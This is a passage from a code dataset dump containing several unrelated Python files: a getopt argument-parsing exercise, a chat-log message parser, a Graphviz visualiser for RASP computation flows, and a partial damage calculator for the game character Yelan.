getopt, sys\n\nargumentList = sys.argv[1:]\n\noptions = \"hmo:\"\n\nlong_options = [\"Help\",\"My_file\",\"output =\"]\n\ntry:\n\n\targuments, values = getopt.getopt(argumentList,options,long_options)\n\n\tfor currentArgument, currentValue in arguments:\n\n\t\t if currentArgument in (\"-h\", \"--Help\"):\n\t\t \tprint (\"Displaying Help\")\n\n\t\t elif currentArgument in (\"-m\", \"--My_file\"):\n\t\t \tprint (\"Displaying file_name:\", sys.argv[0])\n\n\t\t elif currentArgument in (\"-o\", \"--Output\"):\n\t\t \tprint ((\"Enabling special output mode (% s)\") % (currentValue))\n\nexcept getopt.error as err:\n\tprint(str(err))\n","repo_name":"anirudhpendem/Python-Learning","sub_path":"cmd_line_arg/cmd_arg2.py","file_name":"cmd_arg2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"7972071588","text":"import re\nfrom src.convo_objects.TextEquivalent import TextEquivalent\n\ndef read_and_parse_text_file(full_ass_path, block_text_threshold_seconds):\n\t\"\"\"\n\t:param full_ass_path: path to the file where the text data is\n\t:full_ass_path type: str\n\n\t:param block_text_threshold_seconds: number of seconds between sequential texts for \n\tthem to be considered as \"one\" text. they will be merged. 
see `merge_sequential_text_equiv()`\n\t:block_text_threshold_seconds type: int\n\n\t:returns: a list of TextEquivalent objects\n\t:rtype: list\n\t\"\"\"\n\ttext_equivs = []\n\n\twith open(full_ass_path,'r') as whole_ass_convo:\n\t\traw_data = whole_ass_convo.readlines()\n\t\ti = 0\n\t\tfor line in raw_data:\n\t\t\t# search for a couple of letters then a colon, before \n\t\t\tsender = re.search(r'^\\w+\\:',line)\n\t\t\t# search for the timestamp in YYYY-MM-DD HH:MM:SS format.\n\t\t\ttimestamp = re.search(r'\\|\\d+\\-\\d+\\-\\d+\\s?\\d+\\:\\d+\\:\\d+',line)\n\t\t\tif sender and timestamp:\n\t\t\t\t# get rid of the identifying colon, last character\n\t\t\t\tsender_name = sender.group()[:-1]\n\t\t\t\t\n\t\t\t\ttimestamp_string = timestamp.group()\n\t\t\t\t# slice the raw input such that sender & timestamp are gone.\n\t\t\t\t# BUG: this includes the colon and space in the text\n\t\t\t\ttext_msg = line[len(sender_name):-len(timestamp_string)-1]\n\t\t\t\t# get rid of the identifier pipe, first character.\n\t\t\t\tte = TextEquivalent(sender_name,timestamp_string[1:],text_msg)\n\t\t\t\t\n\t\t\t\tif i >= 1:\n\t\t\t\t\tte_prev = text_equivs[i-1]\n\t\t\t\t\tdiff = te.timestamp - te_prev.timestamp\n\t\t\t\t\tif (te_prev.sender==te.sender) and (abs(diff.seconds) < block_text_threshold_seconds):\n\t\t\t\t\t\tte_prev.merge_sequential_text_equiv(te)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttext_equivs.append(te)\n\t\t\t\t\t\ti += 1\n\t\t\t\telse:\n\t\t\t\t\ttext_equivs.append(te)\n\t\t\t\t\ti += 1\n\n\treturn text_equivs","repo_name":"weallwegot/conversation-analytics","sub_path":"src/read_parse.py","file_name":"read_parse.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"41661152768","text":"from FunctionalSupport import UnfinishedSelect, Unfinished, UnfinishedSequence, \\\n\t\t\t\t\t\t\t guarded_contains, guarded_compare, indices, base_tokens, tokens_asis\nfrom Support import clean_val\nimport analyse # adds useful functions to all the unfinisheds\nfrom analyse import UnfinishedFunc\nimport os\nfrom copy import copy\nimport string\n\n# fix: in ordering, we always connect bottom FF to top select. 
but sometimes, there is no FF (if go straight into next select), or there is no rendered select (in special case of full-select)\n\nlayer_color = 'lemonchiffon'\nhead_color = 'bisque' #'yellow'\n\nindices_colour = 'bisque3'\ncomment_colour = 'cornsilk'\nselect_on_colour = 'plum'\nselect_off_colour = head_color\n\ndef windows_path_cleaner(s):\n\tif os.name == \"nt\": # is windows\n\t validchars = \"-_.() \"+string.ascii_letters+string.digits\n\t def fix(c):\n\t \treturn c if c in validchars else \".\"\n\t return \"\".join([fix(c) for c in s])\n\telse:\n\t\treturn s\n\ndef colour_scheme(row_type):\n\tif row_type == INPUT:\n\t\treturn 'gray', 'gray', 'gray'\n\tif row_type == QVAR:\n\t\treturn 'palegreen4','mediumseagreen', 'palegreen1'\n\telif row_type == KVAR:\n\t\treturn 'deepskyblue3','darkturquoise','darkslategray1'\n\telif row_type == VVAR:\n\t\treturn 'palevioletred3','palevioletred2','lightpink'\n\telif row_type == VREAL:\n\t\treturn 'plum4','plum3','thistle2'\t\n\telif row_type == RES:\n\t\treturn 'lightsalmon3','burlywood','burlywood1'\n\telse:\n\t\traise Exception(\"unknown row type: \"+str(row_type))\n\nQVAR, KVAR, VVAR, VREAL, RES, INPUT = [\"QVAR\",\"KVAR\",\"VVAR\",\"VREAL\",\"RES\",\"INPUT\"]\nPOSS_ROWS = [QVAR,KVAR,VVAR,VREAL,RES,INPUT]\nROW_NAMES = {QVAR:\"Me\",KVAR:\"Other\",VVAR:\"X\",VREAL:\"f(X)\",RES:\"FF\",INPUT:\"\"} \n\ndef UnfinishedFunc(f):\n\tsetattr(Unfinished,f.__name__,f)\n\n@UnfinishedFunc\ndef last_val(self):\t\n\treturn self.last_res.get_vals()\n\ndef makeQKStable(qvars,kvars,select,ref_in_g):\n\tqvars = [q.last_val() for q in qvars]\n\tkvars = [k.last_val() for k in kvars]\n\tselect = select.last_val()\n\tq_val_len, k_val_len = len(select), len(select[0])\n\n\tqvars_skip = len(kvars)\n\tkvars_skip = len(qvars)\n\t_, _, qvars_colour = colour_scheme(QVAR)\n\t_, _, kvars_colour = colour_scheme(KVAR)\n\t# select has qvars along the rows and kvars along the columns, so we'll do the same.\n\t# i.e. 
top rows will just be the kvars and first columns will just be the qvars\n\t# if (not qvars) and (not kvars): # no qvars or kvars -> full select -> dont waste space drawing\n\t# \tnum_rows, num_columns = 0, 0\n\t# \tpass\n\t# else:\n\t# \tnum_rows = qvars_skip+(len(qvars[0]) if qvars else 1)\n\t# \tnum_columns = kvars_skip+(len(kvars[0]) if kvars else 1)\n\tnum_rows = qvars_skip+q_val_len\n\tnum_columns = kvars_skip+k_val_len\n\n\tselect_cells = {i:[CellVals('',head_color,j,i) for j in range(num_columns)] \\\n\t\t\t\t\t\tfor i in range(num_rows)}\n\n\n\tfor i,seq in enumerate(kvars):\n\t\tfor j,v in enumerate(seq):\n\t\t\tselect_cells[i][j+kvars_skip] = CellVals(v,kvars_colour,i,j+kvars_skip)\n\tfor j,seq in enumerate(qvars):\n\t\tfor i,v in enumerate(seq):\n\t\t\tselect_cells[i+qvars_skip][j] = CellVals(v,qvars_colour,i+qvars_skip,j)\n\t\n\tfor i in range(num_rows-qvars_skip): # i goes over the q_var values\n\t\tfor j in range(num_columns-kvars_skip): # j goes over the k_var values\n\t\t\tv = select[i][j]\n\t\t\tcolour = select_on_colour if v else select_off_colour\n\t\t\tselect_cells[i+qvars_skip][j+kvars_skip] = CellVals(v,colour,i+qvars_skip,j+kvars_skip,select_internal=True)\n\n\t# TODO: make an ugly little q\\k triangle thingy in the top corner\n\treturn GridTable(select_cells,ref_in_g)\n\nclass CellVals:\n\tdef __init__(self,val,colour,i_row,i_col,select_internal=False,known_portstr=None):\n\t\tdef mystr(v):\n\t\t\tif isinstance(v,bool):\n\t\t\t\tif select_internal:\n\t\t\t\t\treturn ' ' if v else ' ' # color gives it all!\n\t\t\t\telse:\n\t\t\t\t\treturn 'T' if v else 'F'\n\t\t\tif isinstance(v,float):\n\t\t\t\tv = clean_val(v,3)\n\t\t\tif isinstance(v,int) and len(str(v))==1:\n\t\t\t\tv = \" \"+str(v) # for pretty square selectors\n\t\t\treturn str(v).replace(\"<\",\"<\").replace(\">\",\">\")\n\t\tself.val = mystr(val)\n\t\tself.colour = colour\n\t\tif None is known_portstr:\n\t\t\tself.portstr = \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\t\telse:\n\t\t\tself.portstr = known_portstr\n\tdef __str__(self):\n\t\treturn ''+self.val+''\n\n\nclass GridTable:\n\tdef __init__(self,cellvals,ref_in_g):\n\t\tself.ref_in_g = ref_in_g\n\t\tself.cellvals = cellvals\n\t\tself.numcols = len(cellvals.get(0,[]))\n\t\tself.numrows = len(cellvals)\n\t\tself.empty = 0 in [self.numcols,self.numrows]\n\tdef to_str(self,transposed=False):\n\t\tii = sorted(list(self.cellvals.keys()))\n\t\trows = [self.cellvals[i] for i in ii]\n\t\tdef cells2row(cells):\n\t\t\treturn ''+''.join(map(str,cells))+''\n\t\treturn '<'+''.join(map(cells2row,rows))+'
    >'\n\tdef bottom_left_portstr(self):\n\t\treturn self.access_portstr(0,-1)\n\tdef bottom_right_portstr(self):\n\t\treturn self.access_portstr(-1,-1)\n\tdef top_left_portstr(self):\n\t\treturn self.access_portstr(0,0)\n\tdef top_right_portstr(self):\n\t\treturn self.access_portstr(-1,0)\n\tdef top_access_portstr(self,i_col):\n\t\treturn self.access_portstr(i_col,0)\n\tdef bottom_access_portstr(self,i_col):\n\t\treturn self.access_portstr(i_col,-1)\n\tdef access_portstr(self,i_col,i_row):\n\t\treturn self.ref_in_g + \":\" + self.internal_portstr(i_col,i_row)\n\tdef internal_portstr(self,i_col,i_row):\n\t\tif i_col < 0:\n\t\t\ti_col = self.numcols + i_col\n\t\tif i_row < 0:\n\t\t\ti_row = self.numrows + i_row\t\n\t\treturn \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\tdef add_to_graph(self,g):\n\t\tif self.empty:\n\t\t\tpass\n\t\telse:\n\t\t\tg.node(name=self.ref_in_g,shape='none',margin='0',label=self.to_str())\n\nclass Table:\n\tdef __init__(self,seqs_by_rowtype,ref_in_g,rowtype_order=[]):\n\t\tself.ref_in_g = ref_in_g\n\t\t\t# consistent presentation, and v useful for feedforward clarity\n\t\tself.rows = []\n\t\tself.seq_index = {}\n\t\tif len(rowtype_order)>1:\n\t\t\tself.add_rowtype_cell = True\n\t\telse:\n\t\t\tassert len(seqs_by_rowtype.keys()) == 1, \"table got multiple row types but no order for them\"\n\t\t\trowtype_order = list(seqs_by_rowtype.keys())\n\t\t\tself.add_rowtype_cell = not (rowtype_order[0] == RES)\n\t\tself.note_res_dependencies = len(seqs_by_rowtype.get(RES,[]))>1\n\t\tself.leading_metadata_offset = 1 + self.add_rowtype_cell\n\t\tfor rt in rowtype_order:\n\t\t\tseqs = sorted(seqs_by_rowtype[rt],key=lambda seq:seq.creation_order_id)\n\t\t\tfor i,seq in enumerate(seqs): \n\t\t\t\tself.n = self.add_row(seq,rt) # each one appends to self.rows. \n\t\t\t\t# self.n stores length of a single row, they will all be the same, \n\t\t\t\t# just easiest to get like this\n\t\t\t\t# add_row has to happen one at a time b/c they care about length of \n\t\t\t\t# self.rows at time of addition (to get ports right)\n\t\tself.empty = len(self.rows)==0\n\t\tif self.empty:\n\t\t\tself.n = 0\n\t\tself.transpose = False # (len(rowtype_order)==1 and rowtype_order[0]==QVAR)\n\t\t# no need to twist Q, just making the table under anyway\n\t\t# transpose affects the port accesses, but think about that later\n\tdef to_str(self):\n\t\trows = self.rows if not self.transpose else list(zip(*self.rows))\n\t\tdef cells2row(cells):\n\t\t\treturn ''+''.join(cells)+''\n\t\treturn '<'+''.join(map(cells2row,rows))+'
    >'\n\tdef bottom_left_portstr(self):\n\t\treturn self.access_portstr(0,-1)\n\tdef bottom_right_portstr(self):\n\t\treturn self.access_portstr(-1,-1)\n\tdef top_left_portstr(self):\n\t\treturn self.access_portstr(0,0)\n\tdef top_right_portstr(self):\n\t\treturn self.access_portstr(-1,0)\n\tdef top_access_portstr(self,i_col,skip_meta=False):\n\t\treturn self.access_portstr(i_col,0,skip_meta=skip_meta)\n\tdef bottom_access_portstr(self,i_col,skip_meta=False):\n\t\treturn self.access_portstr(i_col,-1,skip_meta=skip_meta)\n\tdef access_portstr(self,i_col,i_row,skip_meta=False):\n\t\treturn self.ref_in_g + \":\" + self.internal_portstr(i_col,i_row,skip_meta=skip_meta)\n\tdef internal_portstr(self,i_col,i_row,skip_meta=False):\n\t\tif skip_meta and (i_col >= 0): # before flip things for reverse column access\n\t\t\ti_col += self.leading_metadata_offset\n\t\tif i_col < 0:\n\t\t\ti_col = (self.n) + i_col\n\t\tif i_row < 0:\n\t\t\ti_row = len(self.rows) + i_row\t\n\t\treturn \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\tdef add_row(self,seq,row_type):\n\t\tdef add_cell(val,colour):\n\t\t\tres = CellVals(val,colour,-1,-1,\n\t\t\t\t\tknown_portstr=self.internal_portstr(len(cells),len(self.rows)))\n\t\t\tcells.append(str(res))\n\n\t\tdef add_strong_line():\n\t\t\t# after failing to inject css styles in graphviz,\n\t\t\t# seeing that their suggestion only creates lines (if at all? unclear) of \n\t\t\t# width 1 (same as the border already there) and it wont make multiple VRs,\n\t\t\t# and realising their suggestion also does nothing,\n\t\t\t# refer to hack at the top of this priceless page:\n\t\t\t# http://jkorpela.fi/html/cellborder.html\n\t\t\tcells.append('')\n\n\t\tqkvr_colour, name_colour, data_colour = colour_scheme(row_type)\n\t\tcells = [] # has to be created in advance, and not just be all the results of add_cell, \n\t\t# because add_cell cares about current length of 'cells'\n\t\tif self.add_rowtype_cell:\n\t\t\tadd_cell(ROW_NAMES[row_type],qkvr_colour)\n\t\tadd_cell(seq.name,name_colour)\n\t\tfor v in seq.last_val():\n\t\t\tadd_cell(v,data_colour)\n\t\tif self.note_res_dependencies:\n\t\t\tself.seq_index[seq] = len(self.rows)\n\t\t\tadd_strong_line()\n\t\t\tadd_cell(\"(\"+str(self.seq_index[seq])+\")\",indices_colour)\n\t\t\tadd_cell(self.dependencies_str(seq,row_type),comment_colour)\n\t\tself.rows.append(cells)\n\t\treturn len(cells)\n\n\tdef dependencies_str(self,seq,row_type):\n\t\tif not row_type == RES:\n\t\t\treturn \"\"\n\t\treturn \"from (\"+\", \".join(str(self.seq_index[m]) for m in seq.get_nonminor_parent_sequences()) +\")\"\n\n\tdef add_to_graph(self,g):\n\t\tif self.empty:\n\t\t\t# g.node(name=self.ref_in_g,label=\"empty table\")\n\t\t\tpass\n\t\telse:\n\t\t\tg.node(name=self.ref_in_g,shape='none',margin='0',label=self.to_str())\n\ndef place_above(g,node1,node2):\n\n\tg.edge(node1.bottom_left_portstr(),node2.top_left_portstr(),style=\"invis\")\n\tg.edge(node1.bottom_right_portstr(),node2.top_right_portstr(),style=\"invis\")\n\ndef connect(g,top_table,bottom_table,select_vals):\n\t# connects top_table as k and bottom_table as q\n\tif top_table.empty or bottom_table.empty:\n\t\treturn # not doing this for now\n\tplace_above(g,top_table,bottom_table)\n\t# just so it positions them one on top of the other, even if select is empty\n\tfor q_i in select_vals:\n\t\tfor k_i,b in enumerate(select_vals[q_i]):\n\t\t\tif b:\n\t\t\t\t# have to add 2 cause first 2 are data type and row name\n\t\t\t\tg.edge(top_table.bottom_access_portstr(k_i,skip_meta=True),\n\t\t\t\t\t 
bottom_table.top_access_portstr(q_i,skip_meta=True),\n\t\t\t\t\t arrowhead='none')\n\nclass SubHead:\n\tdef __init__(self,name,seq):\n\t\tvvars = seq.get_immediate_parent_sequences()\n\t\tif not seq.definitely_uses_identity_function:\n\t\t\tvreal = seq.pre_aggregate_comp()\n\t\t\tvreal(seq.last_w) # run it on same w to fill with right results\n\t\t\tvreals = [vreal]\n\t\telse:\n\t\t\tvreals = []\n\n\t\tself.name = name\n\t\tself.vvars_table = Table({VVAR:vvars,VREAL:vreals},self.name+\"_vvars\",rowtype_order=[VVAR,VREAL]) \n\t\tself.res_table = Table({RES:[seq]},self.name+\"_res\")\n\t\tself.default = \"default: \"+str(seq.default) if not None is seq.default else \"\"\n\t\t# self.vreals_table = ## ? add partly processed vals, useful for eg conditioned_contains?\n\t\n\tdef add_to_graph(self,g):\n\t\tself.vvars_table.add_to_graph(g)\n\t\tself.res_table.add_to_graph(g)\n\t\tif self.default:\n\t\t\tg.node(self.name+\"_default\",shape='rectangle',label=self.default)\n\t\t\tg.edge(self.name+\"_default\",self.res_table.top_left_portstr(),\n\t\t\t\t\t\t\tarrowhead='none')\n\n\tdef add_edges(self,g,select_vals):\n\t\tconnect(g,self.vvars_table,self.res_table,select_vals)\n\n\tdef bottom_left_portstr(self):\n\t\treturn self.res_table.bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn self.res_table.bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\treturn self.vvars_table.top_left_portstr()\n\tdef top_right_portstr(self):\n\t\treturn self.vvars_table.top_right_portstr()\n\nclass Head:\n\tdef __init__(self,name,head_primitives,i):\n\t\tself.name = name\n\t\tself.i = i\n\t\tself.head_primitives = head_primitives\n\t\tselect = self.head_primitives.select\n\t\tq_vars, k_vars = select.q_vars, select.k_vars\n\t\tq_vars = sorted(list(set(q_vars)),key=lambda a:a.creation_order_id)\n\t\tk_vars = sorted(list(set(k_vars)),key=lambda a:a.creation_order_id)\n\t\tself.kq_table = Table({QVAR:q_vars,KVAR:k_vars},self.name+\"_qvars\",rowtype_order=[KVAR,QVAR])\n\t\t# self.k_table = Table({KVAR:k_vars},self.name+\"_kvars\")\n\t\tself.select_result_table = makeQKStable(q_vars,k_vars,select,self.name+\"_select\")\n\t\t# self.select_table = SelectTable(self.head_primitives.select,self.name+\"_select\")\n\t\tself.subheads = [SubHead(self.name+\"_subcomp_\"+str(i),seq) for i,seq in \\\n\t\t\t\t\t\t\t\t\t\t\t\tenumerate(self.head_primitives.sequences)]\n\n\tdef add_to_graph(self,g):\n\t\twith g.subgraph(name=self.name) as head:\n\t\t\tdef headlabel():\n\t\t\t\t# return self.head_primitives.select.name\n\t\t\t\treturn 'head '+str(self.i)+\\\n\t\t\t\t\t\t\t\"\\n(\"+self.head_primitives.select.name+\")\"\n\t\t\thead.attr(fillcolor=head_color, label=headlabel(), \n\t\t\t\t\t\t\t\tfontcolor='black', style='filled')\n\t\t\twith head.subgraph(name=self.name+\"_select_parts\") as sel:\n\t\t\t\tsel.attr(rankdir=\"LR\",label=\"\",style=\"invis\",rank=\"same\")\n\t\t\t\tif True: # not (self.kq_table.empty):\n\t\t\t\t\tself.select_result_table.add_to_graph(sel)\n\t\t\t\t\tself.kq_table.add_to_graph(sel)\n\t\t\t\t\t# sel.edge(self.kq_table.bottom_right_portstr(),\n\t\t\t\t\t\t# self.select_result_table.bottom_left_portstr(),style=\"invis\")\n\t\t\t\n\t\t\t[s.add_to_graph(head) for s in self.subheads]\n\n\tdef add_organising_edges(self,g):\n\t\tif self.kq_table.empty:\n\t\t\treturn\n\t\tfor s in self.subheads:\n\t\t\tplace_above(g,self.select_result_table,s)\n\n\tdef bottom_left_portstr(self):\n\t\treturn self.subheads[0].bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn 
self.subheads[-1].bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\tif not (self.kq_table.empty):\n\t\t\treturn self.kq_table.top_left_portstr()\n\t\telse: # no kq (and so no select either) table. go into subheads\n\t\t\treturn self.subheads[0].top_left_portstr()\n\tdef top_right_portstr(self):\n\t\tif not (self.kq_table.empty):\n\t\t\treturn self.kq_table.top_right_portstr()\n\t\telse:\n\t\t\treturn self.subheads[-1].top_right_portstr()\n\n\n\tdef add_edges(self,g):\n\t\tselect_vals = self.head_primitives.select.last_val()\n\t\t# connect(g,self.k_table,self.q_table,select_vals)\n\t\tfor s in self.subheads:\n\t\t\ts.add_edges(g,select_vals)\n\t\tself.add_organising_edges(g)\n\t\t\t\ndef contains_tokens(mvs):\n\treturn next((True for mv in mvs if guarded_contains(base_tokens,mv)),False)\n\nclass Layer:\n\tdef __init__(self,depth,d_heads,d_ffs,add_tokens_on_ff=False):\n\t\tself.heads = []\n\t\tself.depth = depth\n\t\tself.name = self.layer_cluster_name(depth)\n\t\tfor i,h in enumerate(d_heads):\n\t\t\tself.heads.append(Head(self.name+\"_head\"+str(i),h,i))\t\t\t\n\t\tff_parents = []\n\t\tfor ff in d_ffs:\n\t\t\tff_parents += ff.get_nonminor_parent_sequences()\n\t\tff_parents = list(set(ff_parents))\n\t\tff_parents = [p for p in ff_parents if not guarded_contains(d_ffs,p)]\n\t\trows_by_type = {RES:d_ffs,VVAR:ff_parents}\n\t\trowtype_order = [VVAR,RES]\n\t\tif add_tokens_on_ff and not contains_tokens(ff_parents):\n\t\t\trows_by_type[INPUT] = [tokens_asis]\n\t\t\trowtype_order = [INPUT] + rowtype_order\t\t\n\t\tself.ff_table = Table(rows_by_type,self.name+\"_ffs\",rowtype_order) \n\n\tdef bottom_object(self):\n\t\tif not self.ff_table.empty:\n\t\t\treturn self.ff_table\n\t\telse:\n\t\t\treturn self.heads[-1]\n\tdef top_object(self):\n\t\tif self.heads:\n\t\t\treturn self.heads[0]\n\t\telse:\n\t\t\treturn self.ff_table\n\tdef bottom_left_portstr(self):\n\t\treturn self.bottom_object().bottom_left_portstr()\n\tdef bottom_right_portstr(self):\n\t\treturn self.bottom_object().bottom_right_portstr()\n\tdef top_left_portstr(self):\n\t\treturn self.top_object().top_left_portstr()\n\tdef top_right_portstr(self):\n\t\treturn self.top_object().top_right_portstr()\n\n\tdef add_to_graph(self,g):\n\t\twith g.subgraph(name=self.name) as l:\n\t\t\tl.attr(fillcolor=layer_color, label='layer '+str(self.depth), \n\t\t\t\t\t\tfontcolor='black', style='filled')\n\t\t\tfor h in self.heads:\n\t\t\t\th.add_to_graph(l)\n\t\t\tself.ff_table.add_to_graph(l)\n\n\tdef add_organising_edges(self,g):\n\t\tif self.ff_table.empty:\n\t\t\treturn\n\t\tfor h in self.heads:\n\t\t\tplace_above(g,h,self.ff_table)\n\n\tdef add_edges(self,g):\n\t\tfor h in self.heads:\n\t\t\th.add_edges(g)\n\t\tself.add_organising_edges(g)\n\n\tdef layer_cluster_name(self,depth):\n\t\treturn 'cluster_l'+str(depth) # graphviz needs \n\t\t\t\t\t# cluster names to start with 'cluster'\n\nclass CompFlow:\n\tdef __init__(self,all_heads,all_ffs,force_vertical_layers,add_tokens_on_ff=False):\n\t\tself.force_vertical_layers = force_vertical_layers\n\t\tself.add_tokens_on_ff = add_tokens_on_ff\n\t\tself.make_all_layers(all_heads,all_ffs)\n\tdef make_all_layers(self,all_heads,all_ffs):\n\t\tself.layers = []\n\t\tff_depths = [seq.scheduled_comp_depth for seq in all_ffs]\n\t\thead_depths = [h.comp_depth for h in all_heads]\n\t\tdepths = sorted(list(set(ff_depths+head_depths)))\n\t\tfor d in depths:\n\t\t\td_heads = [h for h in all_heads if h.comp_depth==d]\n\t\t\td_heads = sorted(d_heads,key=lambda h:h.select.creation_order_id) \n\t\t\t\t\t# only 
important for determinism to help debug\n\t\t\td_ffs = [f for f in all_ffs if f.scheduled_comp_depth == d]\n\t\t\tself.layers.append(Layer(d,d_heads,d_ffs,self.add_tokens_on_ff))\n\n\tdef add_all_layers(self,g):\n\t\t[l.add_to_graph(g) for l in self.layers]\n\n\tdef add_organising_edges(self,g):\n\t\tif self.force_vertical_layers:\n\t\t\tfor l1,l2 in zip(self.layers,self.layers[1:]):\n\t\t\t\tplace_above(g,l1,l2)\n\n\tdef add_edges(self,g):\n\t\tself.add_organising_edges(g)\n\t\t[l.add_edges(g) for l in self.layers]\n\n@UnfinishedFunc\ndef draw_comp_flow(self,w,filename=None,\n\t\t\t\tkeep_dot=False,show=True,\n\t\t\t\tforce_vertical_layers=True, add_tokens_on_ff=False): \n\tif not None is w:\n\t\tself(w) # execute seq (and all its ancestors) on the given input w. \n\t\t# if w==None, assume seq has already been executed on some input.\n\t\tif not self.last_w == w:\n\t\t\tprint(\"evaluating input failed\")\n\t\t\treturn\n\telse:\n\t\tw = self.last_w\n\tif None is filename:\n\t\tname = self.name\n\t\tfilename=os.path.join(\"comp_flows\",windows_path_cleaner(name+\"(\"+(str(w) if not isinstance(w,str) else \"\\\"\"+w+\"\\\"\")+\")\"))\n\tself.mark_all_minor_ancestors()\n\tself.make_display_names_for_all_parents(skip_minors=True)\n\t\n\tall_heads,all_ffs = self.get_all_ancestor_heads_and_ffs(remove_minors=True) \n\t\t# this scheduling also marks the analysis parent selects\n\tcompflow = CompFlow(all_heads,all_ffs,\n\t\t\t\t\tforce_vertical_layers=force_vertical_layers,\n\t\t\t\t\tadd_tokens_on_ff = add_tokens_on_ff)\n\n\t# only import graphviz *inside* this function - \n\t# that way RASP can run even if graphviz setup fails\n\t# (though it will not be able to draw computation flows without it)\n\tfrom graphviz import Digraph \n\tg = Digraph('g')\n\tg.attr(splines='polyline') # with curved lines it fusses over separating score edges\n\t\t\t\t# and makes weirdly curved ones that start overlapping with the sequences :(\n\tcompflow.add_all_layers(g)\n\tcompflow.add_edges(g)\n\timg_filename = g.render(filename=filename) # img_filename will end with png or something, filename is an intermediate\n\tif show:\n\t\tg.view()\n\tif not keep_dot:\n\t\tos.remove(filename)","repo_name":"tech-srl/RASP","sub_path":"RASP_support/DrawCompFlow.py","file_name":"DrawCompFlow.py","file_ext":"py","file_size_in_byte":18903,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"44"} +{"seq_id":"11534731715","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nclass Stat():\n def init(self, hp, basehp, crit1, crit2, inc, resist, ainc, qinc):\n self.hp = hp\n self.basehp = basehp\n self.crit1 = crit1\n self.crit2 = crit2\n self.crit = 1 + crit1 * crit2\n self.inc = 1 + inc\n resist = 0.1 - resist\n if(resist < 0):\n self.resist = (1 - resist / 2) * 0.5\n else:\n self.resist = (1 - resist) * 0.5\n self.ainc = ainc\n self.qinc = qinc\n \n def calc(self, sec, base):\n hp = self.hp\n if(sec >= 2.4):\n hp += self.basehp * 0.1\n if(sec >= 3.4):\n hp += self.basehp * 0.1\n inc = self.inc + min(50, 1 + 3.5 * np.floor(sec)) / 100\n damage = base * hp * self.crit * inc * self.resist\n #print(sec, base, hp, self.inc, inc, self.crit, self.resist, damage)\n return damage\n\n def A(self, sec):\n base = 0.325104\n self.inc += self.ainc\n res = self.calc(sec, base)\n self.inc -= self.ainc\n return res\n\n def E(self, sec):\n base = 0.481\n res = self.calc(sec, base)\n return res\n\n def Q(self, sec):\n base = 0.3151\n self.inc += self.qinc\n res = self.calc(sec, base)\n 
self.inc -= self.qinc\n return res\n \n def Q0(self, sec):\n base = 0.1553\n self.inc += self.qinc\n res = self.calc(sec, base)\n self.inc -= self.qinc\n return res\n\n def Q2(self, sec):\n base = 0.14\n self.inc += self.qinc\n res = self.calc(sec, base)\n self.inc -= self.qinc\n return res\n\nA = [1.8, 2.8, 3.8, 4.1, 4.5]\nE = [2.4, 3.4]\nQ = [1.8, 2.4, 2.8, 3.4, 3.8, 4.8, 5.8, 6.8, 7.8, 8.9, 9.9, 10.9, 11.9, 12.9, 13.9, 14.9]\nQ2 = [1.8, 3.7, 6.1, 8.1, 10.2, 12.2, 14.2]\nQ0 = [1.2]\n\ndef calc(yelan, title):\n dam_dict = {}\n\n tot_a = 0\n tot_e = 0\n tot_q = 0\n for sec in A:\n tot_a += yelan.A(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.A(sec)\n\n for sec in E:\n tot_e += yelan.E(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.E(sec)\n\n for sec in Q:\n tot_q += yelan.Q(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q(sec)\n\n for sec in Q2:\n tot_q += yelan.Q2(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q2(sec)\n\n for sec in Q0:\n tot_q += yelan.Q0(sec)\n if(sec not in dam_dict):\n dam_dict[sec] = 0\n dam_dict[sec] += yelan.Q0(sec)\n\n print(title)\n print('生命值:', yelan.hp, '暴击率:', yelan.crit1 * 100, '% 暴击伤害:', yelan.crit2 * 100, '%')\n print('Total: ',tot_a + tot_e + tot_q)\n print('A: ', tot_a / (tot_a + tot_e + tot_q) * 100, '% ', tot_a)\n print('E: ', tot_e / (tot_a + tot_e + tot_q) * 100, '% ', tot_e)\n print('Q: ', tot_q / (tot_a + tot_e + tot_q) * 100, '% ', tot_q)\n\n dam_dict = dict(sorted(dam_dict.items(), key=lambda x : x[0], reverse = False))\n damage = 0\n tempx, tempy = [], []\n for (sec, dam) in dam_dict.items():\n damage += dam\n tempx.append(sec)\n tempy.append(damage)\n \n return tempx, tempy\n\n\ndef Work(title, hp, basehp, crit1, crit2, inc, resist, ainc, qinc, Crit1, Crit2, HP):\n yelan = Stat()\n fig, ax = plt.subplots()\n plt.rcParams['font.family'] = ['sans-serif']\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n print(title)\n yelan.init(hp = HP, basehp = basehp, crit1 = Crit1, crit2 = Crit2, inc = inc, resist = resist, ainc = 0, qinc = qinc)\n tx, ty = calc(yelan, '四绝缘')\n ax.plot(tx, ty, c = 'purple', label = '四绝缘')\n mintime = -1\n\n yelan.init(hp = hp + basehp * 0.2, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0, qinc = 0)\n tempx, tempy = calc(yelan, '二水二千岩')\n for i in range(5, len(tx)):\n if(ty[i] > tempy[i]):\n mintime = max(mintime, tx[i])\n break\n if(i == len(tx) - 1):\n mintime = 16\n ax.plot(tempx, tempy, c = 'green', label = '二水二千岩')\n\n yelan.init(hp = hp, basehp = basehp, crit1 = crit1, crit2 = crit2, inc = inc + 0.15, resist = resist, ainc = 0, qinc = 0.2)\n tempx, tempy = calc(yelan, 